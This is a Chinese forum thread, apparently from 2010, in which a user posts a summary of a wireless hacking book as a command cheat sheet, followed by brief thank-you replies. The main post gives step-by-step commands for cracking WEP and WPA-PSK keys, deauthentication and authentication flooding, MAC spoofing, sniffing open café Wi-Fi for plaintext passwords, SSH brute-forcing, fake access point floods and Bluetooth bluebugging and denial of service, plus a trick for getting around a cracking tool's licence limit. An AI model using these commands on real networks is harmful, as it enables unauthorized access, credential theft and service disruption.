搜索
xcloud 如意云
查看: 7642|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

29

主题

0

听众

3657

积分

少校

Rank: 5

签到天数: 11 天

[LV.3]偶尔看看II

UID
66587
帖子
1338
威望
7
荣誉
6
金币
2182 元
最后登录
2014-4-15
注册时间
2008-11-14
在线时间
425 小时

灌水天才

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
4 l5 E/ S" M0 T; Z6 o' {( Z3 {* Y1 L0 _$ y
以下所有操作均在BackTrack 4中进行。
' i, o% M7 G& b7 ]0 u2 l) y" Q5 N2 S" p5 e

& h! r& G; a& Z6 R' v8 M无线WEP加密P解:2 ~8 [+ p9 h7 \0 P, ?' U

- D0 z' H; ^& A+ y+ v注入P解:, I7 {7 C, f2 H
" @, G, c$ W/ V0 ^4 r/ W" R: F7 Y
ifconfig
9 Q3 A  m+ M) u3 V4 a- R+ |
. B$ v. H# k0 I/ z0 i9 jifconfig –a$ @6 K5 l& n% U- n2 F5 r9 z+ d, V
& Q9 t- b; P. m4 W+ |
ifconfig wlan0(无线网卡) up. E8 D/ Y/ G  ^% t  V

& Y& _2 N0 \2 ]2 k0 \/ W) yairmon-ng start wlan0% U5 B+ X6 B: D5 c( s/ }

1 L  r/ [! g1 W2 u$ _- w6 hairodump-ng mon0
. }) {3 a5 w& w2 j/ ?/ ]% U& W: J
% X; y7 e0 b4 k5 P$ f' [airodump-ng --ivs –w ivsfile –c 频道 mon0或8 O: q, T, C: y8 }$ f5 s
8 K7 t1 a+ [* v+ j9 _8 U6 }% C
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
; y) e. L+ A6 Y; c( N# L9 j) {
& f, H1 r- R; v6 `5 Iaireplay-ng -3 –b BSSID –h Station mon0
. l" |. K/ g# O0 b' O9 L$ ]; n
5 @6 s: s' c% d* ?aircrack-ng ivsfile-01.ivs2 t# E& Y' z( _; D# q! n
9 }" e7 W  ^$ D+ y. p2 S8 w
虚连接P解(适用于无客户端连接APP解)  \8 x" z/ W) N8 k8 E% ^3 X0 O  B
  c" F4 W$ u5 \; b( C4 }8 E
ifconfig
+ ]! J$ Z; O. U% c, P9 z
: Q1 v! m0 S* O- {' d6 n# q6 Y* S* pifconfig –a7 `+ |" R) a, p) M+ e! y

- H/ \6 v% |9 Aifconfig wlan0(无线网卡) up# r  L: ]# V6 K7 U4 m) P( K

# N$ Z5 ^& S  Q$ yairmon-ng start wlan0
; f% @5 z% f( P+ q% Y* @7 x% }
" y- u. V2 \4 ~# _* p1 Hairodump-ng mon06 y) R) |! A  g- q! {: K
7 p8 G- X. _  v' `0 h- v; @
airodump-ng --ivs –w ivsfile –c 频道 mon0或. Y$ I# F3 F8 a5 E4 l

. }  T0 ]4 {2 |) _; q5 p5 j- {. uairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon04 d/ ?' i( Q# t

  T  k) A$ J, X" E  r2 t: taireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
4 J& T! M# n: `  Z8 p
* h* |/ Z- ~0 ]4 j7 Daireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
5 I' x6 G* l0 W8 c$ A1 ~8 `2 y2 t2 Z: Q; g1 Z' P' m8 b
aircrack-ng ivsfile-01.ivs
0 W0 `1 W0 C# ^! q. l
: E+ b6 G4 Q$ }- _6 J) ^! V
8 t8 B, }" y, E还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。/ Y+ w4 N  d$ a5 ~* l. e& `

) \6 m) g/ n' \6 f; [' O
2 `. o5 n+ L4 I( y. F8 RWPA-PSKP解
  ^: ^7 k' H1 U# i, m1 ^( o. U# Q6 s( f7 a$ G8 e& \
ifconfig' Q: a% R; @% y" _$ r! L  {

; M" ]6 ^3 C# K6 c  |5 @' q3 ^# Oifconfig –a
( }4 _& E, ^) y/ C  N* Y. Y. h7 w/ t
. @5 j; n2 q% d3 D# Wifconfig wlan0(无线网卡) up2 ?3 D& ~3 d6 X
8 B" I& _$ x4 x% V
airmon-ng start wlan0
$ D: W3 f0 G8 W0 F" ^: L. s
! P, I$ r  z5 Y7 {airodump-ng mon0
) H# o7 _/ v) t) |$ X  M6 O
- g4 |, k+ G1 v, `: ]4 [airodump-ng –w capfile –c 频道 mon0! `( c6 g! `6 s8 h% ^" W: X

2 \# b8 Q. g# H' A- X+ v: {aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
3 s& \. o- m( G
$ h/ X2 |/ K" n+ I8 H5 faircrack-ng –w Dic capfile-01.cap或* @: b( N: K7 I

9 H( w% j& J  T3 Mcowpatty –f Dic –r capfile-01.cap –s SSID
( I3 i  i8 V& q1 n) _' t3 m0 s9 j# d' j& o. H2 u  D% H
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
& T4 k: [' a; d+ |8 d8 [% x) d' M9 b" A$ v0 t. b. Z
傻瓜式P解软件SpoonWPA。
- Q9 z: s# v  v  l5 f, Y- L7 O  b1 T/ V- w8 z$ ^# k
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst& H+ Q4 Y; K6 a1 ~* N

& m0 a% b3 S6 P9 s& H& P( o: s9 \6 _% L$ G, }
字典文件的生成和上传
, W* H0 U% x! z4 ~
# ^4 F8 n' o: K: C  z5 d- p1 Z在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。/ ~0 \7 B7 P8 f" ~" S8 R0 [

9 i3 x: C2 n& t" S* e+ b& g. }% i3 a+ F0 ?3 E/ s3 G
BT4下开启Tftp:Services—TFTPD—start TFTPD0 S1 o2 f6 _. V7 V% n3 ~
& m, P0 ~% v+ F
在Windows的CMD中运行 tftp –i IP put **.dic
  Q; j0 G# O  m/ U0 O: o1 H: v* y2 `6 j* V5 l! R1 e" |& F

. ~3 C5 R, y: A3 kBT4下开启SSH:Services—SSH—start SSH
( ~$ i8 U. \1 `" p, O1 p- V
; ]" q0 ~2 m+ `Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
" l" d; b% K0 J" w
: \9 x/ _! ^" A+ }) W; A, y: N4 k/ D4 _9 n$ f
AP限制MAC时的解决. U8 J1 Q# t; U& U/ t8 j+ n: ?0 W1 K
( C9 s! H" H8 B$ r; v
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:- O; _% h2 E0 O* A2 v. c

, M/ j# E4 Q9 `8 o3 K4 wifconfig wlan0 hw ether NewMAC
" o( }: ^9 ^. j* S4 X0 r0 [# e* m3 n- Z
& g0 m( H: K) K6 n7 i! s, U& }
关闭SSID广播的AP探测:
4 u( a: K: r# X- e  _, ^" K$ W* Q. c& L; q: u0 H" }
1.     Deauth攻击:# n' d, w# @8 \; N
8 J- z; ^5 P) o! i8 s( l. [
airodump-ng mon0
0 Q2 {* d( X9 z- A# j9 S. C) W
0 C, |) \& ^2 l2 qaireplay-ng -0 10 –a BSSID –h Station mon04 F- P3 n8 E  I! B: _0 [' `! F

7 }. s0 W+ M) f; @) a+ R4 k2.     抓包分析
% I1 _% f1 p' }" D" W1 ~3 V! b6 H  F' C+ ?$ ^
Omnipeek
9 F- {) ~' r2 y. i6 ^- ~4 `) p8 y0 u* s) _
Tcpdump –n –e –vvv –i 网卡名
+ P) `" l, a2 d0 Y% e6 w
: B" V- a4 U6 @9 X" r$ c3.     暴力P解: u) h! l$ b# }# `: y. g
) U- v9 y4 B, \. v4 ^
Charon 1.1暴力P解/ R' Z8 K1 C+ I" ^
7 }) q( u6 O* H. I& @( {+ P

; g8 o" a" V2 W, J$ ?无线加密数据包的解密
- M4 T2 e" I  R  D5 E- u" c: U. t/ A
4 L- j' A: L2 V6 P, M$ a
% P& e% F& p5 I/ }7 Q1 k使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
: {' z" C; C  v1 d
! K: N$ m7 E6 B% I" K" |FilterNS     DNS解析数据包
7 @, j; g# E  A% z& u" v  m' K
2 J3 I9 R- q) @5 P4 |Filter:HTTP    WEB访问数据包
' a. \, z# M' l; u' L4 j1 M$ p9 g' k) G6 g
Filter:msnms   MSN) ?' L" F8 B7 S( I" o& s
3 T, `+ v) y4 f+ b0 M& M
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。5 f8 u6 Q0 }# e, f" z' G6 N

0 \1 T% v2 f% X. D; S1 d- ], J/ @使用airdecap-ng解密:
( t" n+ c2 |' \3 R6 i! r
7 R+ h, j0 M" P% \' J1 D& @Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap* [  {4 D9 @# o( C$ A$ W9 j1 f

- D) H! y5 \5 \. ~
: }: G5 q# e( C9 B' V咖啡馆中无线数据截取(开放式无加密AP)
, L, ?! X0 n5 ]) |9 _) h+ A: w
  z* l* `" G5 x1 M& Z- o. r  ?1.Airodump-ng –w data –c频道 mon0
* |' O- i% ^$ [, E% z2 {) x, ^3 V$ D) W) y- B$ q% ]
2.使用WireShark打开分析8 S. i8 B5 D7 i! @
& K: X3 y+ E; U8 R8 q0 v0 x: G' Q, h

) T$ d1 [. w. c+ NBT4下的渗透工具:( y8 E) ]: ?4 \! r1 i6 i+ [% b
. T$ B, Y& O6 H& i
nmap –sP IP/24        判断C段下存活的主机
! G8 a) r  k: d7 ^* g# Q1 t  F0 Y3 k
nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放5 L8 K3 E* {( T

& Q1 C7 {5 n, `- m- Pnmap –vv –sV IP –p port   指定端口的详细信息。。。
1 @) P. B! l/ ~0 w6 s3 L$ _. a4 w9 k, m1 {* z  _% F/ U
namp –O IP/24    判断主机的系统版本5 n/ ]: A" _0 ?

' J5 V; P- ~' q
3 H5 J$ E* V( I# K* w9 i; OGUI 版nmap:Zenmap 1 z" [8 d4 Q& O( q! z; _/ \

8 q+ u" h/ M  n& S4 y- t% o9 M0 J* w# m, @4 _, ]& k- P
Amap使用:amap –B IP port' W- G# z) ?$ J9 s' J

* G( m7 J& Y8 J( `6 N$ D& Y9 o' y4 {Nbtscan(扫描Windows网络NetBios信息):
) k! F  s9 h9 V) ~9 L5 n, T! o, x  b  N: n- o% f! ]" Z: n
nbtscan –v –s : IP/244 X; Y7 M7 Z; z/ P$ Z8 Z- i/ c

& J) f2 J: N6 i, @  ~! onbtscan –r IP0 t" ?7 k" f' D8 _* Z/ ~/ N

7 M. R2 l. q+ x* ?
' o/ F& w' G7 FDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
' ~* `) j+ |- O9 Y( F3 T' B& _# ]$ k2 x1 G$ L

- q4 l; e( R2 g1 _) m; rHydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
# j( S5 c. |! X% q7 m! k, J, [9 s# {( N* H9 d& p  H! e. m
BruteSSH: ./bruthe.py –h IP –u Username –d Dic
! d9 e0 r5 E' v, l- u! V
8 L" u& j8 b" r* q! J' b. kMetasploit3使用
; @- E2 p. l8 m5 A$ a7 c无线D.0.S
) ~  G! ]# J9 Q: W1 c0 f
- U5 O/ W! j& D& s: G# W. x' S- j2 [9 i% v$ |: t6 l
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)! \* u% d* J: c$ O

2 [6 p" C3 \# j2 ]2 Hairmon-ng start wlan0
, g' z# }1 I5 B9 p, e+ m
0 X6 z: e1 t5 n" b: nairodump-ng mon0
1 A# w  @- f3 l* W! ]; o5 ~! c0 d. u  ]
mdk3 mon0 a –a BSSID0 R" v0 Z/ O) f2 p: G3 S" c

; @9 {8 V, z- W3 Z8 [: d% f* v对所有的AP攻击:mdk3 mon0 a1 w, K6 y/ v. O6 N7 s( m

: f2 ^, R7 H- D: K: c4 @$ L* @1 j- O2 b  t
Deauth Flood 攻击( i! E! A/ f1 Q5 U) Y

; C2 |' d; Z$ `, ^7 D$ k2 `! Bmdk3 mon0 d –c Channel
% z7 k0 K/ s' I* C! W. C( ^# S2 {- h/ p( J8 u0 c
图形化D.O.S攻击:Charon3 i* p  s5 O& v) i9 Q- L
% {& L+ [; f+ [# Y0 ~

# R5 K8 G5 k9 Q' h; ]当受到攻击时,使用Wireshark抓包可以看到异常信息。
3 B7 y, [  H; ^0 C  c4 [4 c
2 g9 K4 |% t' W
7 w. U* f: Q# ?' `6 EWPA-PSK高速P解! M4 F" V3 o" z& D/ g1 I$ j

5 q2 w9 Z" q2 t: {" t7 B1.       WPA-PSK PMK Hash TablesP解5 s2 w4 A1 Q! Q7 q" R+ M: U

% ?% b7 O- z4 L' q7 ?Cowpatty –d HashTable.hash –r ***.cap –s SSID
. f$ l8 ~* h$ l: n+ ~' M7 L
5 Y6 P0 [+ `5 kHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
/ z1 t9 T  u% x3 n5 C6 W: o# D
. c! i0 |6 Q6 a2 ?" m/ V2.       GPU辅助高速P解
) E( T- s1 P* C$ w7 X! Q/ s3 B& [
1 K- s3 U# n1 v使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。+ `' x& l7 u- w$ ^" ~8 h

0 w7 o" |) B7 U0 i3 k/ x, \3.       分布式P解
$ {! w6 I$ ]1 A# [4 j& Z8 Q( Y5 ]8 m7 V( u# N$ _6 ^8 y) m. o, M

2 U% }1 o( T1 r( s9 p0 O/ O& x' C% oAP的伪造
; }% ^1 e0 |+ d; ^
6 `5 N6 J% @  g- g, F! z$ p把AP的MAC改成目标AP的MAC5 |" |! Z$ D' X2 E

* @0 g4 a% E4 |' g, k9 v网卡软AP( I7 b3 o% e8 l" A9 I

' ?- Z% ]% A$ m+ h2 m  k& f6 d* S- T
; I; R) z8 v5 C( S伪造大量虚假AP信号:
6 X1 }: Z' J+ m* Y! O% e3 y% x& S, O0 z) w& \' S2 Z2 H! |0 e
随机SSID:mdk3 mon0 b –g –c 频道
: {' [( D4 q; Q1 o2 {6 T" }' f. Q  J  l
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
8 ^1 C# Y+ k0 l+ Y/ H
) u: m1 f3 D0 q2 i1 \7 ?" f/ p! g$ y' A; m* B6 b; [$ P# J
War-Driving
: k* C2 w! m: }  D( \
# t6 g! g- n5 J8 N: ^: M- n9 D热点地图绘制
! Y+ z, x' r' g* ?& ?. j# R
& _- ~8 Z4 f1 W( i! j* @Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
7 H/ U& D4 u; K
0 c1 c# k7 R3 S; T
6 V2 e  K  g% v4 d( f" t  JNetstumble
6 f) S9 b1 i- g* m5 Q0 J# G. S5 d6 @8 g" P2 H
* m' B0 j, R( l$ H( {# X6 k. S
蓝牙Hacking
2 ~+ q1 K) j1 l
( i- B& _1 o5 HWindows下的Blue Soleil工具
1 z3 j7 i5 \- ?% k  {5 A! \/ r- e: a
BT4:
9 u6 m( @4 W' j& j' G: [& d5 e+ T* P$ A7 h1 ]7 _) r
hciconfig 查看蓝牙适配器/ C( X) g4 ?- U  ?+ t
! M, A8 P3 r/ [# R8 P! d
hciconfig hci0 up 载入蓝牙适配器
. o( ^: C  K' S' s; P: q1 ~) N) g/ [. W/ l2 P' T
hciconfig hci0 class 蓝牙适配器详细信息0 {. T; o" P0 ^! B( E+ n  o5 ^8 Z0 D  z

% r- M2 v- M5 X3 b
7 ^& M& i* K3 k% @+ nhcitool(扫描蓝牙)
& t3 a: F  Y" }' r. l1 H
, {" i/ T8 V0 f: |/ lhcitool –i hci0 scan
" D* h/ C+ Q9 u* |5 p% X& M
3 o$ W' N5 [. [* LBTscanner(扫描蓝牙)
# c. K( }: D/ h
) u9 M: p8 \# K! S' w0 n0 c/ j0 ^% K8 Z9 c" x/ I0 o  d
蓝牙攻击:7 b% S7 y. x- M5 H
8 b7 y  u$ v( Z; c
BlueBugging (适用于BlueTooth V1.1的手机): t5 o/ p0 H* q3 p- |

6 E* t+ o# r% n, G: xBluebugger工具:
+ K& C! ]- q# e  F
+ l$ ^1 o, U+ r( R/ JBulebugger –a HD_Addr info( m7 {9 U" l! d8 m& R0 Z3 ^

; [2 a! X1 ^0 q/ j6 f% j: k
. H6 V  D% ?; U' s3 r  JBlueJacking- L4 ]8 A% h" m% m, [
" q6 d/ P$ L: j) d& O
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。' f2 D* }' U0 D3 `# ?) g( e9 h' n  t1 w

8 ^4 S* r1 g% n, O; ]* d- h  |. x$ T& m8 L
HD_Addr修改:
- C( {5 @  J0 S8 q1 U: R" k
1 M9 ~0 a4 ?# H" ]/ P3 t1 oBdaddr工具
: E2 j& v) ]2 b4 Z- U  j/ D$ r) ?% K8 {, K; w5 E: ^* @
bdaddr –i 蓝牙设备名 新HD_addr
9 T' L6 b/ i8 Y5 H
* v* r. x, ]1 X; ]9 [
7 l1 T9 m. P2 ?蓝牙D.O.S! B5 d$ ]5 o" L) ?
5 H* G3 p6 O; k
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务! I/ V6 Q) u4 a  g! p) p3 ^

; x, H2 d8 g& S% l& c) Hhciconfig, S6 I/ N* S) V0 P' ~* Z( ^: ?2 _
* k  C' i$ b% N! {: e8 o4 d
hciconfig hci0 up0 K9 ]; R1 G- D5 C

% M7 H8 m' q0 n2 a4 S0 A  L- phcitool –i hci0 scan
4 A  K' U& h/ f
  q/ g4 M& M3 }4 Xl2ping –s 10000 –目标MAC# e# k% N! `( h( ?

9 ^( }+ l+ y2 Z( s& B$ N+ O* ?6 T- r% m; W" R
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)% \) k. m, B& w4 {2 E6 w
) v! i5 t2 U0 n4 W0 _( \
./fang –r ************-############ -s: T5 U! c; s; c% [% l+ S
6 o% C/ g6 a( v3 w1 L8 N/ `
暴力P解************-############的蓝牙设备
4 Z4 R9 H7 [" }7 V; I8 j2 e( v9 d0 C
./fang –l 各厂商BD_Addr分配5 s/ T9 M* n( j) Z/ E
) z1 U  u" L4 U1 Y# b. ^
# C8 L9 x1 {3 h) Y% G
WifiZoo使用. K6 b0 S; E8 O% T' I

  H4 ^- B) P& q" `./wifizoo.py –c Capfile/ M4 V# K7 ?3 c# V, o
& c2 W8 S. Q+ s: j) h4 z# R& V
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情
2

查看全部评分

5

主题

0

听众

880

积分

中尉

Rank: 3Rank: 3Rank: 3

该用户从未签到

UID
177172
帖子
182
威望
0
荣誉
0
金币
648 元
最后登录
2010-8-13
注册时间
2009-10-19
在线时间
49 小时
发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
http://tlwxs.wanye68.com/ 欢迎光临
回复

使用道具 举报

0

主题

0

听众

149

积分

上等兵

Rank: 1

该用户从未签到

UID
73201
帖子
56
威望
0
荣誉
0
金币
82 元
最后登录
2010-8-23
注册时间
2008-12-18
在线时间
9 小时
发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

15

主题

1

听众

2265

积分

少校

Rank: 5

签到天数: 2 天

[LV.1]初来乍到

UID
131983
帖子
391
威望
8
荣誉
0
金币
1823 元
最后登录
2013-6-20
注册时间
2009-7-5
在线时间
113 小时
发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

5

主题

0

听众

1128

积分

上尉

Rank: 4Rank: 4Rank: 4Rank: 4

该用户从未签到

UID
220541
帖子
549
威望
0
荣誉
0
金币
500 元
最后登录
2011-10-13
注册时间
2010-1-28
在线时间
20 小时
发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

0

主题

0

听众

251

积分

少尉

Rank: 2Rank: 2

该用户从未签到

UID
225826
帖子
114
威望
2
荣誉
0
金币
121 元
最后登录
2013-6-16
注册时间
2010-2-6
在线时间
56 小时
发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

1

主题

0

听众

760

积分

中尉

Rank: 3Rank: 3Rank: 3

该用户从未签到

UID
33225
帖子
71
威望
0
荣誉
0
金币
685 元
最后登录
2013-6-24
注册时间
2008-3-8
在线时间
36 小时
发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

7

主题

0

听众

678

积分

中尉

Rank: 3Rank: 3Rank: 3

该用户从未签到

UID
231470
帖子
268
威望
4
荣誉
0
金币
355 元
最后登录
2014-4-16
注册时间
2010-2-20
在线时间
350 小时
发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

0

主题

0

听众

107

积分

上等兵

Rank: 1

该用户从未签到

UID
218547
帖子
57
威望
0
荣誉
0
金币
28 元
最后登录
2010-2-26
注册时间
2010-1-25
在线时间
13 小时
发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。" {4 b0 }8 W# }
借来看看。
回复

使用道具 举报

1

主题

0

听众

156

积分

上等兵

Rank: 1

该用户从未签到

UID
130083
帖子
55
威望
0
荣誉
0
金币
99 元
最后登录
2014-2-24
注册时间
2009-6-29
在线时间
18 小时
发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的2 l: N9 B( U6 {# Q: I/ q
呵呵 其实也不贵 21块 快递再一点; ^  H) y7 ?! y
我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

4

主题

0

听众

487

积分

少尉

Rank: 2Rank: 2

该用户从未签到

UID
212234
帖子
298
威望
1
荣誉
0
金币
130 元
最后登录
2012-6-15
注册时间
2010-1-14
在线时间
105 小时
发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

0

主题

0

听众

167

积分

上等兵

Rank: 1

该用户从未签到

UID
234486
帖子
23
威望
0
荣誉
0
金币
133 元
最后登录
2011-8-28
注册时间
2010-2-25
在线时间
7 小时
发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 成为会员

手机版|Archiver| 中国无线门户 ( 粤ICP备11076993 )     免责声明

GMT+8, 2014-4-19 02:13 , Processed in 0.199778 second(s), 32 queries , Gzip On.

Powered by Discuz! X2.5

© 2003-2013 广州威思信息科技有限公司

回顶部